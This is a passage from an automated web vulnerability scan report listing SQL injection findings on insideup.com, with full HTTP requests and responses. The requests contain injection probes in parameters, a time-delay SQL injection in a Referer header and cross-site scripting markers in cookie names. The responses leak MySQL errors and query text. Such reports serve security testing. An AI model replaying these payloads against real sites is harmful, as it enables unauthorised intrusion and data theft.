OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 898

subcategoryId=30005&catId=30005&iusrc=iupsc+&attributeId_429=2789__Commercial+mortgage+loan+(this+answer+redirects+to+our+commercial+mortgages+page)&attributeId_438=2845__Yes+-+we+accept+Visa+and%2for
...[SNIP]...

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:22:32 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qeer2gi33ublcnvshmshesdp32; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/bulo00/project_dynamic_page_updated.php was not found on this server.</p>

1.82. http://www.insideup.com/ppc/leadflow/bulo00/project_dynamic_page_updated.php [template parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project_dynamic_page_updated.php

Issue detail

The template parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the template parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

POST /ppc/leadflow/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00&template=3' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 898

subcategoryId=30005&catId=30005&iusrc=iupsc+&attributeId_429=2789__Commercial+mortgage+loan+(this+answer+redirects+to+our+commercial+mortgages+page)&attributeId_438=2845__Yes+-+we+accept+Visa+and%2for
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:12:18 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=41li08hi0bo4fj6ge9205djaa7; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00&template=3'' OR prj.project_page_url = 'leadflow/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00&template=3'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00&templa' at line 5

Request 2

POST /ppc/leadflow/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00&template=3'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 898

subcategoryId=30005&catId=30005&iusrc=iupsc+&attributeId_429=2789__Commercial+mortgage+loan+(this+answer+redirects+to+our+commercial+mortgages+page)&attributeId_438=2845__Yes+-+we+accept+Visa+and%2for
...[SNIP]...

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:12:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=h6na13v4jbgjsdeometsj8cgs7; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/bulo00/project_dynamic_page_updated.php was not found on this server.</p>

1.83. http://www.insideup.com/ppc/leadflow/caad00/leadflow/caad00/project.php [ca parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/leadflow/caad00/project.php

Issue detail

The ca parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ca parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/leadflow/caad00/project.php?ca' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:05:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=k9vfcntif9td15p83i5elbrh71; path=/
Content-Length: 2182
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/caad00/leadflow/caad00/project.php?ca'' OR prj.project_page_url = 'leadflow/caad00/leadflow/caad00/project.php?ca'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/caad00/leadflow/caad00/project.php?ca'/'
   union select prj.catId,prj.gr' at line 5

Request 2

GET /ppc/leadflow/caad00/leadflow/caad00/project.php?ca'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 07:05:52 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
